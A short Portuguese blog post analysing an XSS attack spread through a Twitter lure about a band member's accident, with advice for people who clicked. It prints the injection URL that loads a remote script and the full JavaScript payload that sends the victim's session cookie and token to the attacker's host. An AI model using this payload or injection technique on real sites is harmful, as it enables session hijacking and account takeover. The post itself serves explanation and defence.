Buenas, várias pessoas foram vítimas de um ataque de cross-site scripting (XSS) feito através do Twitter. Vejamos rapidamente como ele foi feito.
O tweet que estava circulando é esse (não use o link):
Pe Lanza da banda Restart sofre acidente tragico | http://bit.ly/d5Pho8
O link encurtado é o seguinte:
http://dev.twitter.com/search?query=%253C/script%253E%253Cscript src='//dgoh-codes.com/joseph/twitter/lol.js'%253E%253C/script%253E
Submetendo esta string no formulário de busca, o atacante conseguiu que este script fosse rodado na máquina das pessoas que clicaram:
window.onload=function(){
location.href='//dgoh-codes.com/joseph/twitter/?cookie='.concat(escape(document.cookie),'&token=',document.body.innerHTML.match(/value\', \'([^\']+)/i)[1]);
}
Este script pega o cookie e submete em um formulário já preparado pelo atacante, que utiliza o seu cookie como bem entender, e isso inclui retweetar mensagens dizendo que ídolos pré-adolescentes morreram.
O que fazer se você clicou?
- Deslogue do Twitter
- Limpe o Cache do seu navegador
- Exclua os cookies
- Logue outra vez
- Troque sua senha
Depois dessa eu também fiquei paranóico com links.
[]‘s